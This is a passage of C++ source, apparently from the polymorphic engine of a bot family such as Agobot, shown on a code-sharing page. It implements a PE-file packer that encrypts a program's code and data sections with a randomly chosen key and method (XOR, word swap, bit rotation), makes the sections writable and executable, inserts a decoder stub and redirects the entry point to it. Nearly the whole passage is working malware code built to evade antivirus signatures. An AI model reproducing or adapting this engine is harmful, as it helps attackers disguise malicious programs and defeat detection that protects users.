📄 polymorph.cpp.svn-base
字号:
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
*(unsigned long*)(pDataData+i)^=lKey; }
break;
case POLY_TYPE_SWAP:
{ // SWAP to decrypt
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
{ unsigned short word1=*(unsigned short*)(pDataData+i);
unsigned short word2=*(unsigned short*)(pDataData+i+2);
*(unsigned short*)(pDataData+i)=word2;
*(unsigned short*)(pDataData+i+2)=word1; } }
break;
case POLY_TYPE_ROR:
{ // ROL to decrypt
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
{ unsigned long lInput=*(unsigned long*)(pDataData+i);
*(unsigned long*)(pDataData+i)=(lInput<<1)|(lInput>>31); } }
break;
case POLY_TYPE_ROL:
{ // ROR to decrypt
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
{ unsigned long lInput=*(unsigned long*)(pDataData+i);
*(unsigned long*)(pDataData+i)=(lInput>>1)|(lInput<<31); } }
break;
default:
break;
};
// Set the entry point to the old entry
memcpy(&iOptHead->AddressOfEntryPoint, &lEntry, sizeof(lEntry));
// Copy the section data into the image
memcpy(pSectionData, pNewSectionData, iSectionSize);
free(pNewSectionData); break; }
// Found an encoder-suitable section
while(iSectEnc && iSectCode && iSectData) {
// Get values out of the header
char *pSectionData=(char*)szBuffer+iSectEnc->PointerToRawData;
int iSectionSize=iSectEnc->SizeOfRawData;
// Get a key
init_random(); unsigned long lKey;
*((char*)&lKey+0)=brandom(1,254); *((char*)&lKey+1)=brandom(1,254);
*((char*)&lKey+2)=brandom(1,254); *((char*)&lKey+3)=brandom(1,254);
#ifdef DBGCONSOLE
AddLog(" - Encryption key: 0x%8.8X...\n", lKey);
#endif // DBGCONSOLE
// Get a type
unsigned long lType=brandom(1,POLY_NUM_TYPES);
// Set some marker for encryption detection later
iFileHead->TimeDateStamp=0xFFFFFFFF;
// Allocate memory for the new section data
char *pNewSectionData=(char*)malloc(iSectionSize+1);
if(!pNewSectionData) break;
// Build an encoder in the section data
BuildEncoder(pNewSectionData, iSectionSize, iSectEnc->VirtualAddress, \
iSectCode->VirtualAddress, iSectCode->SizeOfRawData, \
iSectData->VirtualAddress, iSectData->SizeOfRawData, \
iOptHead->AddressOfEntryPoint, lKey, lType);
// Set the entry point to the virtual address of the encoder section
memcpy(&iOptHead->AddressOfEntryPoint, &iSectEnc->VirtualAddress, \
sizeof(iSectEnc->VirtualAddress));
// Make the encoder section readable, writable, executable,
// and containing code
iSectEnc->Characteristics = IMAGE_SCN_MEM_EXECUTE |
IMAGE_SCN_MEM_READ |
IMAGE_SCN_MEM_WRITE |
IMAGE_SCN_CNT_CODE;
// Make the code section readable, writable, executable,
// and containing code
iSectCode->Characteristics = IMAGE_SCN_MEM_EXECUTE |
IMAGE_SCN_MEM_READ |
IMAGE_SCN_MEM_WRITE |
IMAGE_SCN_CNT_CODE;
// Make the data section readable, writable and containing inited data
iSectData->Characteristics = IMAGE_SCN_MEM_READ |
IMAGE_SCN_MEM_WRITE |
IMAGE_SCN_CNT_INITIALIZED_DATA;
// XOR the code section
unsigned char *pCodeData=
(unsigned char*)szBuffer+iSectCode->PointerToRawData;
switch(lType)
{
case POLY_TYPE_XOR:
{
#ifdef DBGCONSOLE
AddLog(" - Code: Using XOR encoding...\n", lKey);
#endif // DBGCONSOLE
// XOR to encrypt
for(int i=0;i<iSectCode->SizeOfRawData;i+=4)
*(unsigned long*)(pCodeData+i)^=lKey; }
break;
case POLY_TYPE_SWAP:
{
#ifdef DBGCONSOLE
AddLog(" - Code: Using Word swap encoding...\n", lKey);
#endif // DBGCONSOLE
// SWAP to encrypt
for(int i=0;i<iSectCode->SizeOfRawData;i+=4)
{ unsigned short word1=*(unsigned short*)(pCodeData+i);
unsigned short word2=*(unsigned short*)(pCodeData+i+2);
*(unsigned short*)(pCodeData+i)=word2;
*(unsigned short*)(pCodeData+i+2)=word1; } }
break;
case POLY_TYPE_ROR:
{
#ifdef DBGCONSOLE
AddLog(" - Code: Using bitwise right rotate encoding...\n", lKey);
#endif // DBGCONSOLE
// ROR to encrypt
for(int i=0;i<iSectCode->SizeOfRawData;i+=4)
{ unsigned long lInput=*(unsigned long*)(pCodeData+i);
*(unsigned long*)(pCodeData+i)=(lInput>>1)|(lInput<<31); } }
break;
case POLY_TYPE_ROL:
{
#ifdef DBGCONSOLE
AddLog(" - Code: Using bitwise left rotate encoding...\n", lKey);
#endif // _DEBUG
// ROL to encrypt
for(int i=0;i<iSectCode->SizeOfRawData;i+=4)
{ unsigned long lInput=*(unsigned long*)(pCodeData+i);
*(unsigned long*)(pCodeData+i)=(lInput<<1)|(lInput>>31); } }
break;
default:
break;
};
// XOR the data section
unsigned char *pDataData=
(unsigned char*)szBuffer+iSectData->PointerToRawData;
switch(lType)
{
case POLY_TYPE_XOR:
{
#ifdef DBGCONSOLE
AddLog(" - Data: Using XOR encoding...\n", lKey);
#endif // _DEBUG
// XOR to encrypt
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
*(unsigned long*)(pDataData+i)^=lKey; }
break;
case POLY_TYPE_SWAP:
{
#ifdef DBGCONSOLE
AddLog(" - Data: Using Word swap encoding...\n", lKey);
#endif // _DEBUG
// SWAP to encrypt
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
{ unsigned short word1=*(unsigned short*)(pDataData+i);
unsigned short word2=*(unsigned short*)(pDataData+i+2);
*(unsigned short*)(pDataData+i)=word2;
*(unsigned short*)(pDataData+i+2)=word1; } }
break;
case POLY_TYPE_ROR:
{
#ifdef DBGCONSOLE
AddLog(" - Data: Using bitwise right rotate encoding...\n", lKey);
#endif // _DEBUG
// ROR to encrypt
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
{ unsigned long lInput=*(unsigned long*)(pDataData+i);
*(unsigned long*)(pDataData+i)=(lInput>>1)|(lInput<<31); } }
break;
case POLY_TYPE_ROL:
{
#ifdef DBGCONSOLE
AddLog(" - Data: Using bitwise left rotate encoding...\n", lKey);
#endif // _DEBUG
// ROL to encrypt
for(int i=0;i<iSectData->SizeOfRawData;i+=4)
{ unsigned long lInput=*(unsigned long*)(pDataData+i);
*(unsigned long*)(pDataData+i)=(lInput<<1)|(lInput>>31); } }
break;
default:
break;
};
// Copy the section data into the image
memcpy(pSectionData, pNewSectionData, iSectionSize);
free(pNewSectionData); break; }
// Save the file under a new filename and unmap it
SaveFile(szOutFile); UnmapFile(); return true; }
//
// BuildEncoder
// Setup a new encoder in the memory given as parameter
//
void CPolymorph::BuildEncoder(char *szSectionData, int iSectionSize, DWORD dwOffset, DWORD dwOffsetCode, DWORD dwCodeSize, DWORD dwOffsetData, DWORD dwDataSize, DWORD dwEntryPoint, unsigned long lKey, unsigned long lType) {
// Clear the section and copy the encoder into it
memset(szSectionData, 0, iSectionSize );
memcpy(szSectionData, agoenc, sizeof(agoenc)-1 );
switch(lType)
{
case POLY_TYPE_XOR:
{ int iXORLoopNum=brandom(1,3);
switch(iXORLoopNum)
{
case 1:
#ifdef DBGCONSOLE
AddLog(" - XOR decoder: xorloop\n");
#endif // _DEBUG
memcpy(szSectionData+ENC_OFFSET_DECODER, xorloop, sizeof(xorloop)-1 );
memcpy(szSectionData+ENC_OFFSET_DECODER_DATA, xorloop, sizeof(xorloop)-1 );
break;
case 2:
#ifdef DBGCONSOLE
AddLog(" - XOR decoder: xorloop2\n");
#endif // _DEBUG
memcpy(szSectionData+ENC_OFFSET_DECODER, xorloop2, sizeof(xorloop2)-1 );
memcpy(szSectionData+ENC_OFFSET_DECODER_DATA, xorloop2, sizeof(xorloop2)-1 );
break;
case 3:
#ifdef DBGCONSOLE
AddLog(" - XOR decoder: xorloop3\n");
#endif // _DEBUG
memcpy(szSectionData+ENC_OFFSET_DECODER, xorloop3, sizeof(xorloop3)-1 );
memcpy(szSectionData+ENC_OFFSET_DECODER_DATA, xorloop3, sizeof(xorloop3)-1 );
break;
default:
break; } }
break;
case POLY_TYPE_SWAP:
#ifdef DBGCONSOLE
AddLog(" - Swap decoder: swaploop\n");
#endif // _DEBUG
memcpy(szSectionData+ENC_OFFSET_DECODER, swaploop, sizeof(swaploop)-1 );
memcpy(szSectionData+ENC_OFFSET_DECODER_DATA, swaploop, sizeof(swaploop)-1 );
break;
case POLY_TYPE_ROR:
#ifdef DBGCONSOLE
AddLog(" - ROR decoder: rolloop\n");
#endif // _DEBUG
memcpy(szSectionData+ENC_OFFSET_DECODER, rolloop, sizeof(rolloop)-1 );
memcpy(szSectionData+ENC_OFFSET_DECODER_DATA, rolloop, sizeof(rolloop)-1 );
break;
case POLY_TYPE_ROL:
#ifdef DBGCONSOLE
AddLog(" - ROL decoder: rorloop\n");
#endif // _DEBUG
memcpy(szSectionData+ENC_OFFSET_DECODER, rorloop, sizeof(rorloop)-1 );
memcpy(szSectionData+ENC_OFFSET_DECODER_DATA, rorloop, sizeof(rorloop)-1 );
break;
default:
break;
};
// dwDataSize+=0x1000; // FIXME: Bad Hack
// Configure the encoder
memcpy(szSectionData+ENC_OFFSET_OFFSET, &dwOffset, sizeof(unsigned long));
memcpy(szSectionData+ENC_OFFSET_OFFSET_CODE, &dwOffsetCode, sizeof(unsigned long));
memcpy(szSectionData+ENC_OFFSET_CODE_SIZE, &dwCodeSize, sizeof(unsigned long));
memcpy(szSectionData+ENC_OFFSET_OFFSET_DATA, &dwOffsetData, sizeof(unsigned long));
memcpy(szSectionData+ENC_OFFSET_DATA_SIZE, &dwDataSize, sizeof(unsigned long));
memcpy(szSectionData+ENC_OFFSET_KEY, &lKey, sizeof(unsigned long));
memcpy(szSectionData+ENC_OFFSET_ENTRYPOINT, &dwEntryPoint, sizeof(unsigned long));
memcpy(szSectionData+ENC_OFFSET_TYPE, &lType, sizeof(unsigned long));
}
//
// MapFile
// This creates a memory mapped file
//
int CPolymorph::MapFile(const char *szFile, char **szBuffer) {
// Try to open the file
FILE *fp=fopen(szFile, "rb"); if(!fp) return 0;
// Get the file size
fseek(fp, 0, SEEK_END); int iFileSize=(int)ftell(fp); fseek(fp, 0, SEEK_SET);
// Allocate the memory for the mapping
*szBuffer=(char*)malloc(iFileSize); if(!*szBuffer) { fclose(fp); return 0; }
// Read the file into memory
if(fread(*szBuffer, sizeof(char), iFileSize, fp)<iFileSize) { fclose(fp); return 0; }
// Copy values to the corresponding member variables and close the file
m_iFileSize=iFileSize; m_szBuffer=*szBuffer; fclose(fp); return iFileSize; }
//
// UnmapFile
// This unmaps the memory mapped file
//
void CPolymorph::UnmapFile() {
// Free the memory for the file
free(m_szBuffer); }
//
// SaveFile
// This saves the memory mapped file back to disk
//
void CPolymorph::SaveFile(const char *szFile) {
// Open the new file
FILE *fp=fopen(szFile, "w+b"); if(!fp) return;
// Write the mapped memory to the file
fwrite(m_szBuffer, sizeof(char), m_iFileSize, fp);
// Close the file
fclose(fp); }
#endif // WIN32
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -